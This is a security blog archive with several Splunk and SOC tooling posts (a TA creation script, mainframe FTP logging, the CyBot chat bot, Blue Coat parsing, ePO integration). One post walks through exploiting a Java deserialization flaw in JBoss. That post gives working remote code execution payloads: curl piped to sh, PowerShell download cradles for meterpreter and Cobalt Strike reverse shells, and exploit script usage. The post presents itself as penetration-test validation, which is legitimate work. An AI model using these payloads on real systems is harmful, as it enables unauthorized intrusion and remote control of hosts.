Wednesday, September 13, 2017

Splunk Technology Add-on (TA) Creation Script

By Tony Lee


Introduction

If you develop a Splunk application, at some point you may find yourself needing a Technology Add-on (TA) to accompany the app. Essentially, the TA reuses most of the app's files, except for the user interface (UI/views). TAs are typically installed on indexers and heavy forwarders to process incoming data. Splunk briefly covers the difference between an app and an add-on in the link below:

https://docs.splunk.com/Documentation/Splunk/6.6.3/Admin/Whatsanapp

Maintaining two codebases can be time-consuming though. Instead, it is possible to develop one application and extract the necessary components to build a TA. There may be other solutions, such as the Splunk Add-on Builder (https://splunkbase.splunk.com/app/2962/), but I found the script below to be one of the easiest methods.

Approach

This could be written in any language; however, my development environment is Linux-based, so the quickest and easiest solution was to write the script using bash. Feel free to translate it to another language if needed.

Usage

Usage is simple.  Just supply the name of the application and it will create the TA from the existing app.

The app should be located here (if not, change the APP_HOME variable in the script):

/opt/splunk/etc/apps/<AppName>

Copy and paste the bash shell script (Create-TA.sh) below to the /tmp directory and make it executable:

chmod +x /tmp/Create-TA.sh

Then run the script from the tmp directory and supply the application name:

Create-TA.sh <AppName>

Ex:  Create-TA.sh cylance_protect

Once complete, the TA will be located here:  /tmp/TA-<AppName>.spl
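
The resulting .spl package is simply a gzipped tarball, so you can verify its contents before deploying it to an indexer or heavy forwarder. For example, using the sample app name from above:

tar -tzf /tmp/TA-cylance_protect.spl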

Code

#!/bin/bash
# Create-TA
# anlee2 - at - vt.edu
# TA Creation tool written in bash
# Input:  App name   (ex: cylance_protect)
# Output: /tmp/TA-<app name>.spl

# Path to the Splunk app home.  Change if this is not accurate.
APP_HOME="/opt/splunk/etc/apps"


##### Function Usage #####
# Prints usage statement
##########################
Usage()
{
echo "TA-Create v1.0
Usage:  TA-Create.sh <App name>

  -h = help menu

Please report bugs to anlee2@vt.edu"
}


# Detect the absence of command line parameters.  If the user did not specify any, print usage statement
[[ $# -eq 0 || $1 == "-h" ]] && { Usage; exit 0; }

# Set the app name and TA name based on user input
APP_NAME=$1
TA_NAME="TA-$1"

echo -e "\nApp name is:  $APP_NAME\n"


echo -e "Creating directory structure under /tmp/$TA_NAME\n"
mkdir -p /tmp/$TA_NAME/default /tmp/$TA_NAME/metadata /tmp/$TA_NAME/lookups /tmp/$TA_NAME/static /tmp/$TA_NAME/appserver/static


echo -e "Copying files...\n"
cp $APP_HOME/$APP_NAME/default/eventtypes.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/app.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/props.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/tags.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/transforms.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/static/appIcon.png  /tmp/$TA_NAME/static/appicon.png 2>/dev/null
cp $APP_HOME/$APP_NAME/static/appIcon.png  /tmp/$TA_NAME/appserver/static/appicon.png 2>/dev/null
cp $APP_HOME/$APP_NAME/README /tmp/$TA_NAME/ 2>/dev/null
cp $APP_HOME/$APP_NAME/lookups/* /tmp/$TA_NAME/lookups/ 2>/dev/null

echo -e "Modifying app.conf...\n"
sed -i "s/$APP_NAME/$TA_NAME/g" /tmp/$TA_NAME/default/app.conf
sed -i "s/is_visible = .*/is_visible = false/g" /tmp/$TA_NAME/default/app.conf
sed -i "s/description = .*/description = TA for $APP_NAME./g" /tmp/$TA_NAME/default/app.conf
sed -i "s/label = .*/label = TA for $APP_NAME./g" /tmp/$TA_NAME/default/app.conf


echo -e "Creating default.meta...\n"
cat >/tmp/$TA_NAME/metadata/default.meta <<EOL
# Application-level permissions
[]
access = read : [ * ], write : [ admin, power ]
export = system

### EVENT TYPES
[eventtypes]
export = system

### PROPS
[props]
export = system

### TRANSFORMS
[transforms]
export = system

### LOOKUPS
[lookups]
export = system

### VIEWSTATES: even normal users should be able to create shared viewstates
[viewstates]
access = read : [ * ], write : [ * ]
export = system
EOL

cd /tmp; tar -zcf TA-$APP_NAME.spl $TA_NAME


echo -e "Finished.\n\nPlease check for you file here:  /tmp/$TA_NAME.spl"

Conclusion

Hopefully this helps others save some time by maintaining one application and extracting the necessary data to create the technology add-on.

Props

Huge thanks to Mike McGinnis for testing and feedback.  :-)

Sunday, August 27, 2017

Splunk: The unsung hero of creative mainframe logging

By Tony Lee

The situation

Have you ever, in your life, heard a good sentence that started with: “So, we have this mainframe... that has logging and compliance requirements…” Yeah, me neither. But this was a unique situation that required a quick and creative solution--and it needed to be done yesterday.  Cue the horror music.

In summary:  We needed to quickly log and make sense of mainframe data for reporting and compliance reasons. The mainframe did not support external logging such as syslog. However, the mainframe could produce a CSV file, and that file could be scheduled to upload to an FTP server (not SFTP, FTPS, or SCP).  Yikes!

Possible solutions

We could stand up an FTP server and use the Splunk Universal Forwarder to monitor the FTP upload directory, but we did not have extra hardware or virtual capacity readily available. After a quick Google search, we ran across this little gem called the Splunk FTP Receiver app (written by Luke Murphey):  https://splunkbase.splunk.com/app/3318/. This app cleverly creates a python FTP server using Splunk—best of all, it leverages Splunk’s user accounts and role-based access controls.

How it worked

At a high level, here are the steps involved:
  1. Install the FTP Receiver app:  https://splunkbase.splunk.com/app/3318/
  2. Create an index for the mainframe data (Settings -> Indexes -> New -> Name: mainframe)
  3. Create an FTP directory for the uploaded files (mkdir /opt/splunk/ftp)
  4. Create FTP Data input (Settings -> Data Inputs -> Local Inputs -> FTP -> New -> name: mainframe, port: 2121, path: ftp, sourcetype: csv, index: mainframe)
  5. Create a role with the ftp_write privileges (Settings -> Access Controls -> Roles: Add new -> Name: ftp_write, Capabilities: ftp_write)
  6. Create a Splunk user for the FTP Receiver app (Settings -> Access Controls -> Users: Add new -> Name: mainframe, Assign to roles: ftp_write)
  7. Configure the mainframe to send to the FTP Receiver app port (on your own for that one)
  8. Create a local data input to monitor the FTP upload directory and ingest as CSV (Settings -> Data inputs -> Local inputs -> Files and Directories -> New -> Browse to /opt/splunk/ftp -> Continuously monitor -> Sourcetype: csv, index: mainframe)


Illustrated, the solution looks like this:


Figure 1:  Diagram of functional components

If you run into any issues, troubleshoot and confirm that the FTP server is working via a common web browser.



Figure 2:  Troubleshooting with the web browser
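
If a web browser is not handy, curl speaks FTP natively and can exercise the same path from the command line. A minimal sketch, assuming the data input from step 4 (port 2121) and the account from step 6; the host name, password, and test file are placeholders:

# List the FTP root exposed by the FTP Receiver input
curl ftp://<SplunkServer>:2121/ --user mainframe:<password>

# Upload a small test CSV and confirm it lands in /opt/splunk/ftp and is indexed
curl -T test.csv ftp://<SplunkServer>:2121/ --user mainframe:<password>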

Conclusion

Putting aside concerns that the mainframe may be older than most of the IT staff, and the fact that FTP is still a clear-text protocol, this was an interesting solution made possible by the flexibility of Splunk. Add some mitigating controls and a little bit of SPL + dashboard design, and it may be the easiest and most powerful mainframe reporter in existence.



Figure 3:  Splunk rocks, the process works

Thursday, August 17, 2017

CyBot – Threat Intelligence Chat Bot

By Tony Lee

Introduction

For those who could not attend, this year’s Black Hat security conference did not disappoint.  It was an awesome time to collaborate and share with the security community.  In doing so, we open-sourced a new tool at Black Hat Arsenal aimed at assisting Security Operations Centers (SOCs) and digital first responders.  We affectionately call it:  CyBot – Threat Intelligence Chat Bot.


We understand that typical SOC environments face a number of challenges:
  • Many SOCs are overwhelmed with the number of incoming alerts
  • Service Level Agreements (SLAs) often define a maximum time to investigate and contain an incident
  • Security tools may be plentiful but they are often not centralized
  • Collaboration on a large investigation may be challenging

We have even seen cases where the SOC receives so many alerts that all of them may not be properly investigated.

To combat this, CyBot can be your threat intelligence chat bot waiting to do research for you.  For example, instead of going to various websites or dashboards to perform research, you could just ask CyBot simple questions and even share results with other investigators.  All from within one chat window you can do the following and more:
  • Ask about the threat reputation of URLs and hashes
  • Perform WHOIS, nslookup, and geoip lookups
  • Unshorten potentially malicious shortened URLs
  • Extract links from a potentially malicious website

CyBot Menu

Best of all, this capability is now free and being actively developed.  All documentation, slides, and plugins have been made publicly available via github:  https://github.com/CylanceSPEAR/CyBot.
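
CyBot is built on top of Errbot (credited in the Props below), so pulling down a copy to experiment with is quick. A minimal sketch, assuming a working Python/pip environment; see the repository's documentation for the authoritative install and configuration steps:

git clone https://github.com/CylanceSPEAR/CyBot.git
pip install errbot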

Props

Very few tasks are ever accomplished in complete isolation.  Tools, services, and ideas were combined from awesome places such as:
  • Errbot developers for the fantastic tool and customer service
  • VirusTotal
  • geoip - freegeoip.net
  • Google Safebrowsing - https://developers.google.com/safe-browsing/ and Jun C. Valdez
  • Hashid - C0re
  • Unshorten - unshorten.me
  • Codename - https://mark.biek.org/code-name/
  • Black Hat Arsenal team for the amazing support and tool release venue

  • Non-bots: Bill Hau, Corey White, Dennis Hanzlik, Ian Ahl, Dave Pany, Dan Dumond, Kyle Champlin, Kierian Evans, Andrew Callow, Mark Stevens

Monday, April 24, 2017

Efficient Blue Coat (and other) Splunk Log Parsing

By Tony Lee

Special Notes

1)  This blog post does not pertain only to Blue Coat logs; it may apply to other data sources as well.
2)  This is not a knock on Blue Coat, the app, the TA, or any of that; it is just one example of many where we might want to change the way we send data to Splunk.  Fortunately, Blue Coat provides the means to do so.  (hat tip)

Background info

A little while back, we were working on a custom Splunk app that included ingesting Blue Coat logs into a SOC's single pane of glass, but we were getting the following error message:

Field extractor name=custom_client_events is unusually slow (max single event time=1146ms)

The Splunk architecture was more than sufficient.  The Blue Coat TA worked great on small instances, but we found that it did not scale to a Blue Coat deployment of this magnitude.  The main reason for this error was that the field extraction in transforms.conf looked like this:

[custom_client_events]
REGEX = (?<date>[^\s]+)\s+(?<time>[^\s]+)\s+(?<duration>[^\s]+)\s+(?<src_ip>[^\s]+)\s+(?<user>[^\s]+)\s+(?<cs_auth_group>[^\s]+)\s+(?<x_exception_id>[^\s]+)\s+(?<filter_result>[^\s]+)\s+\"(?<category>[^\"]+)\"\s+(?<http_referrer>[^\s]+)\s+(?<status>[^\s]+)\s+(?<action>[^\s]+)\s+(?<http_method>[^\s]+)\s+(?<http_content_type>[^\s]+)\s+(?<cs_uri_scheme>[^\s]+)\s+(?<dest>[^\s]+)\s+(?<uri_port>[^\s]+)\s+(?<uri_path>[^\s]+)\s+(?<uri_query>[^\s]+)\s+(?<uri_extension>[^\s]+)\s+\"(?<http_user_agent>[^\"]+)\"\s+(?<dest_ip>[^\s]+)\s+(?<bytes_in>[^\s]+)\s+(?<bytes_out>[^\s]+)\s+\"*(?<x_virus_id>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_name>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_operation>[^\"]+)

The volume and complexity of the data were simply too much for this type of extraction.

Solution

The solution is not to make Splunk adapt, but instead to change the way data is sent to it. The Blue Coat app and TA require sending data in the bcreportermain_v1 format--which is an ELFF format. The Blue Coat app and TA then try to parse this space-separated data using the complex regex seen above. Fortunately, instead of doing that, you can instruct Blue Coat to send the data in a different format, such as key=value pairs--which Splunk likes and natively parses.

In this case, have the Blue Coat admins define a custom log format with the following fields:

Bluecoat|date=$(date)|time=$(time)|duration=$(time-taken)|src_ip=$(c-ip)|user=$(cs-username)|cs_auth_group=$(cs-auth-group)|x_exception_id=$(x-exception-id)|filter_result=$(sc-filter-result)|category=$(cs-categories)|http_referrer=$(cs(Referer))|status=$(sc-status)|action=$(s-action)|http_method=$(cs-method)|http_content_type=$(rs(Content-Type))|cs_uri_scheme=$(cs-uri-scheme)|dest=$(cs-host)|uri_port=$(cs-uri-port)|uri_path=$(cs-uri-path)|uri_query=$(cs-uri-query)|uri_extension=$(cs-uri-extension)|http_user_agent=$(cs(User-Agent))|dest_ip=$(s-ip)|bytes_in=$(sc-bytes)|bytes_out=$(cs-bytes)|x_virus_id=$(x-virus-id)|x_bluecoat_application_name=$(x-bluecoat-application-name)|x_bluecoat_application_operation=$(x-bluecoat-application-operation)|target_ip=$(cs-ip)|proxy_name=$(x-bluecoat-appliance-name)|proxy_ip=$(x-bluecoat-proxy-primary-address)|$(x-bluecoat-special-crlf)

Since this data now comes into Splunk as key=value pairs, Splunk parses it natively.

We then removed the TAs from the indexer and replaced them with a simpler props.conf containing only this:

[bluecoat:proxysg:customclient]
SHOULD_LINEMERGE = false

This just turns off line merging, which is on by default, and makes the parsing even faster. Also remember to rename the props.conf and transforms.conf (ex: to .bak files) included in the app if you have it installed on your search head--they contain the same complicated regex, which will slow things down. Lastly, by defining your own format, you can add other fields you care about--such as the target IP (cs-ip), which is not included in the default bcreportermain_v1 format for some reason. We hope this helps others that run into this situation.
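
For completeness, here is a minimal sketch of those last two steps on a search head: renaming the bundled configs and then confirming that the key=value fields extract from the new sourcetype. The app directory name is a placeholder; adjust it and the search to your environment:

# Rename the bundled props/transforms so the old regex is no longer applied
cd /opt/splunk/etc/apps/<BlueCoatApp>/default
mv props.conf props.conf.bak
mv transforms.conf transforms.conf.bak

# Quick sanity check that fields extract from the new key=value format
/opt/splunk/bin/splunk search 'sourcetype="bluecoat:proxysg:customclient" | head 5 | table src_ip user dest status action'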

Conclusion

Again, this issue is not isolated to Blue Coat; it applies to any data source that has the ability to change the way it sends data. We were quite happy to find that Blue Coat provides that ability--it certainly reduced the load on the entire system and gave back those resources for ingesting other data.  Hat tip to Blue Coat for providing the flexibility of custom log formats.  Happy Splunking!


Sunday, April 9, 2017

Quick and Easy Deserialization Validation

By Tony and Chris Lee

Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products including but not limited to JBoss, Jenkins, Weblogic, and Websphere. The example finding below is from Nessus vulnerability scanner:

JBoss Java Object Deserialization RCE
Description:  The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.  (CVE-2015-7501)

Family: Web Servers
Nessus Plugin ID: 87312

Now that you have the finding you need to validate it.  We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.


Background info

In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."

For more information, a very good and detailed explanation can be found here:  https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/


Step 1) Download Tools

Now on to the exploit/validation!  Clone or download the zipped tools here:  https://github.com/getcode2git/exserial
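
A one-liner for the clone option (the zipped download works just as well):

git clone https://github.com/getcode2git/exserial.git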



Step 2) Building the payload

Quick and easy one-liners per the exserial instructions:
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell.  If you are spawning reverse shells, remember to start your listener first.  ;-)

1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl http://myserver.com/todo.sh|/bin/sh" > payload.ser

2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j

Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('http://myserver.com/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser

3)  Cobalt Strike beacon
Create the listener (ex:  reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name:  rev_https
Payload:  windows/beacon_https/reverse_https
IP:  <Your teamserver IP>
Port:  443

Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this

Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/a'))" > payload.ser


Step 3) Running the Exploit

Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The example below shows the syntax and usage for the JBoss exploit.

Syntax:
python jboss.py http://<target>:<port> /path/to/payload

Example:
python jboss.py  http://JbossServer:8080 /root/deserial/payload.ser


Conclusion

This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include downloading a "flag", running a reverse ping, or spawning a netcat shell.
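
If you prefer the lower-impact reverse-ping option, a minimal sketch looks like this (the payload syntax follows the exserial examples above; <YourIP> is a host you control, and tcpdump runs there while the exploit fires):

# On the host you control, watch for the incoming pings
tcpdump -n -i any icmp

# Build a payload that simply pings back to you
java -jar exserial.jar CommandExec Linux "ping -c 4 <YourIP>" > payload.ser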

Huge thanks to https://github.com/RickGray for the publicly available tools.

Saturday, January 7, 2017

Forensic Investigator Splunk App - Version 1.1.8

By Tony Lee and Kyle Champlin

The latest version of the Forensic Investigator app (version 1.1.8) is now available. We will only cover three major changes, but here are the rest of the details:
  • Added option to hide the MIR menus via the setup screen
  • Added proxy support to setup screen
  • Made vtLookup proxy aware
  • Made vtLookup accept and use non-default API key
  • Added CyberChef (En/Decoder -> CyberChef) - Big thanks to GCHQ for the awesome tool!
  • Added ePO Connector to control McAfee ePolicy Orchestrator
    • Requires editing bin/epoconnector.py and adding the ePO IP, port, username, and password

1.  CyberChef

The folks over at GCHQ created an awesome encoding/decoding tool called CyberChef, which is available here: https://gchq.github.io/CyberChef/. Even more impressive, it is a stand-alone, client-side HTML page that was released under the Apache License version 2.0. We integrated it into the Forensic Investigator app as a useful component that can be utilized even on closed networks. Huge thanks to the developers at GCHQ.

CyberChef integrated into the Forensic Investigator App

2.  ePO Connector

The Forensic Investigator ePO connector can be used to integrate Splunk and McAfee's ePolicy Orchestrator (ePO). This dashboard can task ePO via its API to do the following:
  • Query
  • Wake up
  • Set tag
  • Clear tag
This allows users to query for hosts using a hostname, IP address, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.  This feature is covered in more depth here:  http://securitysynapse.blogspot.com/2016/12/splunk-and-mcafee-epo-integration-part-ii.html

ePO connector feature

3.  Proxy Awareness

You spoke and we listened. The Virus Total Lookup feature in the app is now proxy aware. If this feature works well, we will make the rest of the app proxy aware too. To enable the proxy settings, use the setup screen (Help -> Configure App) and enter the required data found in the screenshot.

Proxy setup
Please let us know if you run into any issues with the proxy setup or if it seems to be working well for you.  We will use this information to tweak the setup screen in the next version of the app.

Conclusion 

We enjoy the feedback on the application--both good and bad, so please keep it coming. Let us know how you are using the application and how we can make it better.  Enjoy. :-)

Monday, December 26, 2016

Splunk and McAfee ePO Integration – Part II

By Tony Lee

In our previous article we outlined one method to integrate McAfee's ePolicy Orchestrator (ePO) with Splunk’s flexible Workflow actions. This allows SOC analysts to task ePO directly from Splunk. In this article, we will highlight a different and potentially more user-friendly method. For convenience, we have integrated this dashboard into version 1.1.8 of the Forensic Investigator app (Toolbox -> ePO Connector).


Forensic Investigator app ePO connector tool

As with the previous article, all that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

It still may be useful to first ensure that our ePO credentials, URL, and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will return a list of supported web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/core.help"

If this failed, then check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>"
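
Once system.find works, the same web API exposes the tagging and wake-up commands that the dashboard wraps. A hedged sketch is shown below; exact command names can vary by ePO version, so confirm them against the core.help output:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.applyTag?names=<hostname>&tagName=Quarantine"
curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.wakeupAgent?names=<hostname>"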

Splunk Integration

The Forensic Investigator ePO connector dashboard contains the following ePO capabilities:

  • Query
  • Wake up
  • Set tag
  • Clear tag

This allows users to query for hosts using a hostname, IP address, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.

Setup

1)  Download and install
Before this integration is possible, first install the Forensic Investigator app (version 1.1.8 or later).

2)  CLI edit
Then edit the following file:

$SPLUNK_HOME/etc/apps/ForensicInvestigator/bin/epoconnector.py

Set the following:  IP, port, username, and password

theurl = 'https://<IP>:8443/remote/'
username = '<username>'
password = '<password>'

3)  Web UI dashboard edit
The dashboard is accessible via Toolbox --> ePO Connector.  There is a Quarantine tag present by default, but others can be added via the Splunk UI by selecting the edit button on the dashboard.


Lingering concerns

Using this integration method, there are a few remaining concerns:

  • The ePO password is contained in the epoconnector.py python script
    • Fortunately, this is only exposed to Splunk admins.
    • Let us know if you have another solution (a simple file-permission sketch follows this list).  :-)
  • ePO API authentication uses Base64-encoded credentials (HTTP Basic authentication).  The resulting URL can be modified and replayed, and it will still authenticate and issue commands to ePO.
    • SSL should be used with the ePO API to protect the communications
    • Limit this dashboard to only trusted users.
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries.  We also filtered out blank queries in the python script.
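
On the first point, one simple mitigation is to tighten the filesystem permissions on the script so that only the Splunk service account can read it. A minimal sketch, assuming Splunk runs as the splunk user:

chown splunk:splunk $SPLUNK_HOME/etc/apps/ForensicInvestigator/bin/epoconnector.py
chmod 600 $SPLUNK_HOME/etc/apps/ForensicInvestigator/bin/epoconnector.py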
 

Conclusion 

This second ePO integration method should be quite user-friendly and can be restricted to those who only need access to this dashboard. It can also be used in conjunction with our previous integration method. Enjoy!